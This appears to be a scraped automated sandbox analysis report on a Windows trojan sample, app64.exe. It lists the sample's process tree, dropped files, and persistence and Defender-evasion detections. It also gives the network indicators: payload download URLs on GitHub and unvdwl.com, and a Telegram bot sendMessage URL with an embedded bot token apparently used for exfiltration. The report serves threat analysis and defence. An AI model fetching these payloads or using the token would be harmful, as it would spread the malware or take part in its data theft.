processes 35->55 57 2 other processes 37->57 file9 signatures10 process11 file12 101 C:\Windows\System32\zlib1.dll, PE32+ 39->101 dropped 103 C:\Windows\System32\x590769.dat, PE32+ 39->103 dropped 105 C:\Windows\System32\usvcldr64.dat, PE32+ 39->105 dropped 109 10 other files (8 malicious) 39->109 dropped 153 Adds a directory exclusion to Windows Defender 39->153 155 Suspicious command line found 39->155 59 cmd.exe 1 39->59         started        62 cmd.exe 1 39->62         started        64 cmd.exe 39->64         started        69 4 other processes 39->69 157 Loading BitLocker PowerShell Module 43->157 107 C:\Windows \System32\printui.dll (copy), PE32+ 51->107 dropped 66 xcopy.exe 2 51->66         started        signatures13 process14 file15 159 Suspicious powershell command line found 59->159 71 powershell.exe 23 59->71         started        74 conhost.exe 59->74         started        161 Adds a directory exclusion to Windows Defender 62->161 76 powershell.exe 23 62->76         started        78 conhost.exe 62->78         started        163 Drops executables to the windows directory (C:\Windows) and starts them 64->163 80 console_zero.exe 64->80         started        82 conhost.exe 64->82         started        97 C:\Windows \System32\printui.exe, PE32+ 66->97 dropped 84 reg.exe 1 1 69->84         started        86 powershell.exe 69->86         started        89 8 other processes 69->89 signatures16 process17 dnsIp18 139 Loading BitLocker PowerShell Module 71->139 91 cmd.exe 80->91         started        141 Creates a Windows Service pointing to an executable in C:\Windows 84->141 121 api.telegram.org 149.154.167.220, 443, 49885 TELEGRAMRU United Kingdom 86->121 signatures19 process20 process21 93 conhost.exe 91->93         started        95 schtasks.exe 91->95         started       

          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


          windows-stand
          SourceDetectionScannerLabelLink
          app64.exe26%ReversingLabsWin32.Trojan.Generic
          SourceDetectionScannerLabelLink
          C:\Windows\System32\x590769.dat100%Joe Sandbox ML
          C:\Windows \System32\printui.exe0%ReversingLabs
          C:\Windows\System32\libcrypto-3-x64.dll0%ReversingLabs
          C:\Windows\System32\libcurl.dll0%ReversingLabs
          C:\Windows\System32\libiconv-2.dll0%ReversingLabs
          C:\Windows\System32\libintl-9.dll0%ReversingLabs
          C:\Windows\System32\libpq.dll0%ReversingLabs
          C:\Windows\System32\libssl-3-x64.dll0%ReversingLabs
          C:\Windows\System32\libwinpthread-1.dll0%ReversingLabs
          C:\Windows\System32\ucrtbased.dll0%ReversingLabs
          C:\Windows\System32\vcruntime140d.dll0%ReversingLabs
          C:\Windows\System32\x590769.dat54%ReversingLabsWin64.Trojan.Generic
          C:\Windows\System32\zlib1.dll0%ReversingLabs
          No Antivirus matches
          No Antivirus matches
          SourceDetectionScannerLabelLink
          https://contoso.com/License0%URL Reputationsafe
          https://contoso.com/0%URL Reputationsafe
          https://nuget.org/nuget.exe0%URL Reputationsafe
          http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
          http://nuget.org/NuGet.exe0%URL Reputationsafe
          http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
          http://schemas.xmlsoap.org/soap/encoding/0%URL Reputationsafe
          https://go.micro0%URL Reputationsafe
          https://contoso.com/Icon0%URL Reputationsafe
          http://schemas.xmlsoap.org/wsdl/0%URL Reputationsafe
          https://www.openssl.org/H0%URL Reputationsafe
          https://aka.ms/pscore680%URL Reputationsafe
          NameIPActiveMaliciousAntivirus DetectionReputation
          unvdwl.com
          194.26.192.52
          truefalse
            unknown
            github.com
            140.82.121.4
            truefalse
              unknown
              ipinfo.io
              34.117.59.81
              truefalse
                unknown
                raw.githubusercontent.com
                185.199.111.133
                truefalse
                  unknown
                  rootunvbot.com
                  188.116.21.204
                  truefalse
                    unknown
                    api.telegram.org
                    149.154.167.220
                    truetrue
                      unknown
                      dns.google
                      8.8.8.8
                      truefalse
                        unknown
                        rootunvdwl.com
                        unknown
                        unknowntrue
                          unknown
                          NameMaliciousAntivirus DetectionReputation
                          https://dns.google/resolve?name=rootunvdwl.comfalse
                            unknown
                            https://raw.githubusercontent.com/unvd01/unvmain/main/un2/botprnt.datfalse
                              unknown
                              https://ipinfo.io/jsonfalse
                                unknown
                                https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagefalse
                                  unknown
                                  https://dns.google/resolve?name=unvdwl.comfalse
                                    unknown
                                    https://github.com/unvd01/unvmain/raw/main/un2/botprnt.datfalse
                                      unknown
                                      NameSourceMaliciousAntivirus DetectionReputation
                                      https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/main/ubotrestorehard.datsvchost.exe, 0000001C.00000002.3269141211.000001D8E78F6000.00000004.00000020.00020000.00000000.sdmpfalse
                                        unknown
                                        https://api.telegram.orgpowershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmpfalse
                                          unknown
                                          https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datsvchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                            unknown
                                            https://github.compowershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027126437000.00000004.00000800.00020000.00000000.sdmpfalse
                                              unknown
                                              https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpu.datsvchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                unknown
                                                https://contoso.com/Licensepowershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessagea$powershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                  unknown
                                                  https://ipinfo.io/jsonhardware_manager::download_json_error:svchost.exe, 0000001C.00000002.3269807622.00007FF8A7FCE000.00000002.00000001.01000000.0000000B.sdmp, x590769.dat.13.drfalse
                                                    unknown
                                                    http://crl.microsoftkpowershell.exe, 00000028.00000002.2570252643.0000018001535000.00000004.00000020.00020000.00000000.sdmpfalse
                                                      unknown
                                                      https://www.openssl.org/svchost.exefalse
                                                        unknown
                                                        https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datfsvchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          unknown
                                                          http://194.26.192.52/un2/urestorehard.datsvchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            unknown
                                                            https://api.telegram.opowershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://api.telegram.org/bpowershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://curl.se/docs/hsts.htmlsvchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                  unknown
                                                                  http://github.compowershell.exe, 00000003.00000002.2218673511.000002712643C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://curl.se/docs/alt-svc.html#svchost.exe, console_zero.exefalse
                                                                      unknown
                                                                      https://curl.se/svchost.exe, console_zero.exefalse
                                                                        unknown
                                                                        https://github.com/unvd01/unvmaipowershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://curl.se/docs/hsts.html#svchost.exe, console_zero.exefalse
                                                                            unknown
                                                                            https://github.com/unvdwl/dwl/raw/main/ubotrestorehard.datpt:svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://api.telegram.org/powershell.exe, 00000028.00000002.2620974839.000001801B64F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://contoso.com/powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://nuget.org/nuget.exepowershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                • URL Reputation: safe
                                                                                unknown
                                                                                https://api.telegram.orpowershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://api.telegrampowershell.exe, 00000028.00000002.2570675567.0000018003664000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://api.telegram.org/bot7985593430:aaef1nr-tpqit5epqkopg8e701bartuiav0/sendmessagepowershell.exe, 00000028.00000002.2620911550.000001801B540000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/uamd.datsvchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033D3000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        • URL Reputation: safe
                                                                                        unknown
                                                                                        https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/unv.datsvchost.exe, 0000001C.00000002.3268822127.000001D8E7813000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          http://www.gnu.org/licenses/svchost.exe, 0000001C.00000002.3268300166.00000000682A4000.00000008.00000001.01000000.00000011.sdmpfalse
                                                                                            unknown
                                                                                            http://nuget.org/NuGet.exepowershell.exe, 00000003.00000002.2248920872.0000027134EE1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            • URL Reputation: safe
                                                                                            unknown
                                                                                            https://api.telegram.org/bot7985powershell.exe, 00000028.00000002.2570675567.00000180037FD000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              • URL Reputation: safe
                                                                                              unknown
                                                                                              https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessJOprintui.exe, 0000000D.00000002.2687540971.0000020E692D8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://curl.se/docs/http-cookies.htmlsvchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                  unknown
                                                                                                  http://schemas.xmlsoap.org/soap/encoding/powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  • URL Reputation: safe
                                                                                                  unknown
                                                                                                  http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    unknown
                                                                                                    https://api.telegram.org/bot7985593430:AAEF1nr-tPqIt5EPQKoPG8e701BArtUIAv0/sendMessage.dllpowershell.exe, 00000028.00000002.2567151922.00000180012EA000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      unknown
                                                                                                      https://go.micropowershell.exe, 00000003.00000002.2218673511.000002712595C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003861000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://contoso.com/Iconpowershell.exe, 00000003.00000002.2248920872.0000027134D9E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      • URL Reputation: safe
                                                                                                      unknown
                                                                                                      https://dns.google/resolve?name=x590769.dat.13.drfalse
                                                                                                        unknown
                                                                                                        https://www.gnu.org/licenses/svchost.exe, 0000001C.00000002.3267873513.00000000660F4000.00000008.00000001.01000000.00000013.sdmpfalse
                                                                                                          unknown
                                                                                                          https://github.com/unvd01/unvmain/raw/refs/heads/main/cmn/ucpusys.datsvchost.exe, 0000001C.00000002.3268859281.000001D8E7840000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                            unknown
                                                                                                            https://curl.se/docs/alt-svc.htmlsvchost.exe, svchost.exe, 0000001C.00000002.3270172050.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, console_zero.exe, 00000022.00000002.2596284562.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623137940.00007FF8B83CB000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                              unknown
                                                                                                              https://github.com/Pester/Pesterpowershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                unknown
                                                                                                                https://api.telegrapowershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  unknown
                                                                                                                  https://raw.githubusercontent.com/rootunvbot/mydata/refs/heads/svchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    unknown
                                                                                                                    https://curl.se/docs/copyright.htmlDsvchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                      unknown
                                                                                                                      http://www.zlib.net/svchost.exefalse
                                                                                                                        unknown
                                                                                                                        https://github.com/unvd01/unvmain/raw/refs/heads/main/un2/uusb.datsvchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                          unknown
                                                                                                                          https://api.telegram.powershell.exe, 00000028.00000002.2570675567.000001800372A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                            unknown
                                                                                                                            https://raw.githubusercontent.compowershell.exe, 00000003.00000002.2218673511.0000027126460000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                              unknown
                                                                                                                              http://unvdwl.com/un2/botprnt.datpowershell.exe, 00000003.00000002.2218673511.000002712635C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2218673511.0000027124F5C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                unknown
                                                                                                                                http://mingw-w64.sourceforge.net/Xsvchost.exe, 0000001C.00000002.3267456047.0000000064953000.00000008.00000001.01000000.00000012.sdmpfalse
                                                                                                                                  unknown
                                                                                                                                  https://curl.se/docs/copyright.htmlsvchost.exe, console_zero.exefalse
                                                                                                                                    unknown
                                                                                                                                    http://www.zlib.net/Dsvchost.exe, 0000001C.00000002.3270431776.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 00000022.00000002.2597133834.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmp, console_zero.exe, 0000002C.00000002.2623418463.00007FF8BA257000.00000002.00000001.01000000.0000000E.sdmpfalse
                                                                                                                                      unknown
                                                                                                                                      https://api.telepowershell.exe, 00000028.00000002.2570675567.0000018003E32000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        unknown
                                                                                                                                        http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000010.00000002.2251089599.000001F4CA22B000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C9078000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://www.openssl.org/Hsvchost.exe, 0000001C.00000002.3270095241.00007FF8A9391000.00000002.00000001.01000000.0000000F.sdmp, svchost.exe, 0000001C.00000002.3269701868.00007FF8A7ECE000.00000002.00000001.01000000.00000010.sdmp, libssl-3-x64.dll.13.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        http://raw.githubusercontent.compowershell.exe, 00000003.00000002.2218673511.0000027126477000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          unknown
                                                                                                                                          http://unvdwl.com/un2/urestorehard.datsvchost.exe, 0000001C.00000002.3269218535.000001D8E7B02000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            unknown
                                                                                                                                            https://aka.ms/pscore68powershell.exe, 00000003.00000002.2218673511.0000027124D31000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000010.00000002.2251089599.000001F4C8E51000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.00000180033AC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000028.00000002.2570675567.0000018003377000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            • URL Reputation: safe
                                                                                                                                            unknown
                                                                                                                                            https://curl.se/docs/http-cookies.html#svchost.exe, console_zero.exefalse
                                                                                                                                              unknown
                                                                                                                                              http://api.telegram.orgpowershell.exe, 00000028.00000002.2570675567.0000018003DB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                unknown
                                                                                                                                                https://curl.se/Vsvchost.exe, 0000001C.00000002.3270248168.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 00000022.00000002.2596558102.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmp, console_zero.exe, 0000002C.00000002.2623260708.00007FF8B83EB000.00000002.00000001.01000000.0000000C.sdmpfalse
                                                                                                                                                  unknown
                                                                                                                                                  • No. of IPs < 25%
                                                                                                                                                  • 25% < No. of IPs < 50%
                                                                                                                                                  • 50% < No. of IPs < 75%
                                                                                                                                                  • 75% < No. of IPs
                                                                                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                  8.8.8.8
                                                                                                                                                  dns.googleUnited States
                                                                                                                                                  15169GOOGLEUSfalse
                                                                                                                                                  149.154.167.220
                                                                                                                                                  api.telegram.orgUnited Kingdom
                                                                                                                                                  62041TELEGRAMRUtrue
                                                                                                                                                  194.26.192.52
                                                                                                                                                  unvdwl.comNetherlands
                                                                                                                                                  1213HEANETIEfalse
                                                                                                                                                  34.117.59.81
                                                                                                                                                  ipinfo.ioUnited States
                                                                                                                                                  139070GOOGLE-AS-APGoogleAsiaPacificPteLtdSGfalse
                                                                                                                                                  140.82.121.4
                                                                                                                                                  github.comUnited States
                                                                                                                                                  36459GITHUBUSfalse
                                                                                                                                                  188.116.21.204
                                                                                                                                                  rootunvbot.comPoland
                                                                                                                                                  43333NEPHAX-ASPLfalse
                                                                                                                                                  185.199.111.133
                                                                                                                                                  raw.githubusercontent.comNetherlands
                                                                                                                                                  54113FASTLYUSfalse
                                                                                                                                                  IP
                                                                                                                                                  127.0.0.1
                                                                                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                                                                                  Analysis ID:1545289
                                                                                                                                                  Start date and time:2024-10-30 11:28:05 +01:00
                                                                                                                                                  Joe Sandbox product:CloudBasic
                                                                                                                                                  Overall analysis duration:0h 10m 17s
                                                                                                                                                  Hypervisor based Inspection enabled:false
                                                                                                                                                  Report type:full
                                                                                                                                                  Cookbook file name:default.jbs
                                                                                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                  Number of analysed new started processes analysed:59
                                                                                                                                                  Number of new started drivers analysed:0
                                                                                                                                                  Number of existing processes analysed:0
                                                                                                                                                  Number of existing drivers analysed:0
                                                                                                                                                  Number of injected processes analysed:1
                                                                                                                                                  Technologies:
                                                                                                                                                  • HCA enabled
                                                                                                                                                  • EGA enabled
                                                                                                                                                  • AMSI enabled
                                                                                                                                                  Analysis Mode:default
                                                                                                                                                  Analysis stop reason:Timeout
                                                                                                                                                  Sample name:app64.exe
                                                                                                                                                  Detection:MAL
                                                                                                                                                  Classification:mal100.troj.evad.winEXE@89/48@10/8
                                                                                                                                                  EGA Information:
                                                                                                                                                  • Successful, ratio: 62.5%
                                                                                                                                                  HCA Information:
                                                                                                                                                  • Successful, ratio: 54%
                                                                                                                                                  • Number of executed functions: 74
                                                                                                                                                  • Number of non-executed functions: 242
                                                                                                                                                  Cookbook Comments:
                                                                                                                                                  • Found application associated with file extension: .exe
                                                                                                                                                  • Exclude process from analysis (whitelisted): dllhost.exe, consent.exe, WMIADAP.exe, SIHClient.exe, WmiPrvSE.exe, svchost.exe
                                                                                                                                                  • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 2124 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target powershell.exe, PID 6620 because it is empty
                                                                                                                                                  • Execution Graph export aborted for target printui.exe, PID 6656 because there are no executed function
                                                                                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                  • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                  • VT rate limit hit for: app64.exe
                                                                                                                                                  TimeTypeDescription
                                                                                                                                                  06:28:51API Interceptor1x Sleep call for process: app64.exe modified
                                                                                                                                                  06:28:53API Interceptor202x Sleep call for process: powershell.exe modified
                                                                                                                                                  06:29:12API Interceptor1x Sleep call for process: printui.exe modified
                                                                                                                                                  06:29:42API Interceptor1x Sleep call for process: svchost.exe modified
                                                                                                                                                  06:29:44API Interceptor2x Sleep call for process: console_zero.exe modified
                                                                                                                                                  11:29:46Task SchedulerRun new task: console_zero path: C:\Windows\System32\console_zero.exe
                                                                                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                  149.154.167.220na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                    na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                      na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                        na.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                                          file.exeGet hashmaliciousWhiteSnake StealerBrowse
                                                                                                                                                            ADJUNTA.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                              Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                Request For Quotation-RFQ097524_Pdf.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                  Request For Quotation-RFQ097524.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                    Pedido de Cota#U00e7#U00e3o -RFQ20241029.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                                                      34.117.59.81VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      UjbjOP.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      I9xuKI2p2B.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      licarisan_api.exeGet hashmaliciousIcarusBrowse
                                                                                                                                                                      • ipinfo.io/ip
                                                                                                                                                                      build.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/ip
                                                                                                                                                                      YjcgpfVBcm.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      lePDF.cmdGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      6Mpsoq1.php.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      mjOiDa1hrN.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      8ym4cxJPyl.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • ipinfo.io/json
                                                                                                                                                                      140.82.121.4RfORrHIRNe.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • github.com/ssbb36/stv/raw/main/5.mp3
                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                      raw.githubusercontent.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                      https://filerit.com/pi-240924.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                      General Agreement.docx.exeGet hashmaliciousPython Stealer, Babadeda, Exela Stealer, Waltuhium GrabberBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      VM2ICvV5qQ.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.109.133
                                                                                                                                                                      https://github.com/Matty77o/malware-samples-m-h/raw/refs/heads/main/TheTrueFriend.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 185.199.108.133
                                                                                                                                                                      seethebestthingsformygirlshegreatfornewways.htaGet hashmaliciousCobalt StrikeBrowse
                                                                                                                                                                      • 185.199.111.133
                                                                                                                                                                      ipinfo.ioPbfYaIvR5B.exeGet hashmaliciousDCRat, PureLog Stealer, zgRATBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      https://load.aberegg-immobilien.ch/Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      VertusinstruccionesFedEX_66521.zipGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      kQyd2z80gD.exeGet hashmaliciousDCRatBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      wOP5sowoN1.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      oD0N44Ka53.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      sgc0e7HpH5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      uHaQ34KPq5.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 34.117.59.81
                                                                                                                                                                      github.comfile.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      file.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                      • 140.82.121.4
                                                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, AsyncRAT, LummaC Stealer, Stealc, XWormBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Win64.Trojan.Agent.2S9FJA.25494.32016.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                      • 140.82.121.3
                                                                                                                                                                      SecuriteInfo.com.Trojan.Agent.GMXD.11819.15970.exeGet hashmaliciousUnknownBrowse
